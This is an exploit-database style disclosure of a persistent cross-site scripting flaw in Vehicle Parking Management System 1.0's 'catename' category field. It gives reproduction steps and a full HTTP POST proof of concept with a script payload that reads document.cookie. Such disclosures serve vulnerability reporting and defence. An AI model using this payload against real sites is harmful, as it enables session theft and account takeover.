38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
|
|
# Date: 2021-02-25
|
|
# Exploit Author: Tushar Vaidya
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
|
|
# Version: v1.0
|
|
# Tested on: Ubuntu
|
|
|
|
|
|
*Steps to Reproduce:*
|
|
1) Login with Admin Credentials and click on the '*Manage category*' button.
|
|
2) Click on the '*Add Categories*' button.
|
|
3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
|
|
4) Now add the following payload input field of *Category *as a parameter name is *catename*
|
|
|
|
Payload: ba1man"><script>alert(document.cookie)</script>
|
|
|
|
4) Click On Save
|
|
5) Now go to '*Manage category > View Categories*'
|
|
5) XSS payload is triggered.
|
|
|
|
*proof-of-concept:*
|
|
1) Request:
|
|
|
|
POST /lagos_parker/parker/addcategory.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
|
|
Firefox/68.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/lagos_parker/parker/addcategory.php
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 82
|
|
Connection: close
|
|
Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
|
|
Upgrade-Insecure-Requests: 1
|
|
catename=ba1man"><script>alert(document.cookie)</script>&submit= |